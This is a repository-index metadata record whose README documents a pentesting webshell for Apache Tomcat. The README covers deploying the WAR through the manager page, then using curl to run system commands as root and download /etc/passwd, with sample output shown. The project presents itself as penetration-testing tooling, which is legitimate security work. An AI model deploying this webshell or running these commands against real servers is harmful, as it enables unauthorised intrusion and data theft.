{"id":17994993,"url":"https://github.com/p0dalirius/tomcat-webshell-application","last_synced_at":"2025-04-06T11:11:11.775Z","repository":{"id":41381910,"uuid":"492338473","full_name":"p0dalirius/Tomcat-webshell-application","owner":"p0dalirius","description":"A webshell application and interactive shell for pentesting Apache Tomcat servers.","archived":false,"fork":false,"pushed_at":"2025-02-11T08:22:35.000Z","size":4509,"stargazers_count":102,"open_issues_count":1,"forks_count":16,"subscribers_count":3,"default_branch":"master","last_synced_at":"2025-03-30T10:08:58.629Z","etag":null,"topics":["apache","app","exploit","pentest","plugin","rce","tomcat","web"],"latest_commit_sha":null,"homepage":"https://podalirius.net/","language":"Java","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/p0dalirius.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null},"funding":{"github":"p0dalirius","patreon":"Podalirius"}},"created_at":"2022-05-14T22:33:19.000Z","updated_at":"2025-03-03T09:20:29.000Z","dependencies_parsed_at":"2024-01-03T22:25:07.382Z","dependency_job_id":"0fe063db-28a1-4884-bfa0-15c3eab5e1b5","html_url":"https://github.com/p0dalirius/Tomcat-webshell-application","commit_stats":null,"previous_names":[],"tags_count":3,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/p0dalirius%2FTomcat-webshell-application","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/p0dalirius%2FTomcat-webshell-application/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/p0dalirius%2FTomcat-webshell-application/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/p0dalirius%2FTomcat-webshell-application/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/p0dalirius","download_url":"https://codeload.github.com/p0dalirius/Tomcat-webshell-application/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247471521,"owners_count":20944158,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["apache","app","exploit","pentest","plugin","rce","tomcat","web"],"created_at":"2024-10-29T20:17:26.114Z","updated_at":"2025-04-06T11:11:11.708Z","avatar_url":"https://github.com/p0dalirius.png","language":"Java","funding_links":["https://github.com/sponsors/p0dalirius","https://patreon.com/Podalirius"],"categories":[],"sub_categories":[],"readme":"# Apache Tomcat webshell application for RCE\n\n\u003cp align=\"center\"\u003e\n  A webshell application and interactive shell for pentesting Apache Tomcat servers.\n  \u003cbr\u003e\n  \u003cimg alt=\"GitHub release (latest by date)\" src=\"https://img.shields.io/github/v/release/p0dalirius/Tomcat-plugin-webshell\"\u003e\n  \u003ca href=\"https://twitter.com/intent/follow?screen_name=podalirius_\" title=\"Follow\"\u003e\u003cimg src=\"https://img.shields.io/twitter/follow/podalirius_?label=Podalirius\u0026style=social\"\u003e\u003c/a\u003e\n  \u003ca href=\"https://www.youtube.com/c/Podalirius_?sub_confirmation=1\" title=\"Subscribe\"\u003e\u003cimg alt=\"YouTube Channel Subscribers\" src=\"https://img.shields.io/youtube/channel/subscribers/UCF_x5O7CSfr82AfNVTKOv_A?style=social\"\u003e\u003c/a\u003e\n  \u003cbr\u003e\n\u003c/p\u003e\n\n## Features\n\n - [x] Webshell plugin for Apache Tomcat.\n - [x] Execute system commands via an API with `?action=exec`.\n - [x] Download files from the remote system to your attacking machine `?action=download`.\n\n## Usage\n\n**Requirements**: You need to have the credentials of an high privilege account of the Apache Tomcat server.\n\n### Step 1: Access the Tomcat manager and upload the webshell plugin\n\nFirst of all, you will need to access the Apache Tomcat `/manager` page at http://127.0.0.1:10080/manager/html, and connect to it with an high privilege account of the Apache Tomcat server.\n\n![](./.github/manager.png)\n\nThen choose the WAR file of the webshell plugin and click on \"Deploy\":\n\n![](./.github/upload_a_plugin.png)\n\nAnd the application is deployed:\n\n![](./.github/webshell_uploaded.png)\n\n### Step 2.1: Executing commands\n\nYou can now execute commands by sending a GET or POST request to http://127.0.0.1:10080/webshell/api.jsp with `action=exec\u0026cmd=id`:\n\n```sh\n$ curl -X POST 'http://127.0.0.1:10080/webshell/api.jsp' --data \"action=exec\u0026cmd=id\"\n{\"stdout\":\"uid=0(root) gid=0(root) groups=0(root)\\n\",\"stderr\":\"\",\"exec\":[\"/bin/bash\",\"-c\",\"id\"]}\n```\n\nYou can also access it by a GET request from a browser:\n\n![](./.github/exec_code_web.png)\n\n### Step 2.2: Downloading files\n\nYou can also download remote files by sending a GET or POST request to http://127.0.0.1:10080/webshell/api.jsp with `action=download\u0026cmd=/etc/passwd`:\n\n```sh\n$ curl -X POST 'http://127.0.0.1:10080/webshell/api.jsp' --data \"action=download\u0026path=/etc/passwd\" -o-\nroot:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n_apt:x:100:65534::/nonexistent:/usr/sbin/nologin\n```\n\n### Step 3: The interactive console\n\nWhen your webshell is active, you can now use the interactive [console.py](console.py) to execute commands and download remote files.\n\nhttps://user-images.githubusercontent.com/79218792/168489455-023b52c5-e8a9-4cd9-96ca-f26c14304236.mp4\n\n## Development\n\nIf you need to compile this plugin, you can use the docker image provided, simply type `make` to build your plugin present in the `webshell` folder. Output WAR files will be put in the [`./webshell/dist/`](./webshell/dist/) folder.\n\n![](./.github/compile.png)\n\nThen if you need to test the plugin locally, you can start an Apache Tomcat instance with the test environnement in [./test_env/](./test_env/).\n\n## References\n - https://linuxtut.com/create-a-java-servlet-and-jsp-war-file-to-deploy-to-apache-tomcat-9-in-gradle-eb464/\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fp0dalirius%2Ftomcat-webshell-application","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fp0dalirius%2Ftomcat-webshell-application","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fp0dalirius%2Ftomcat-webshell-application/lists"}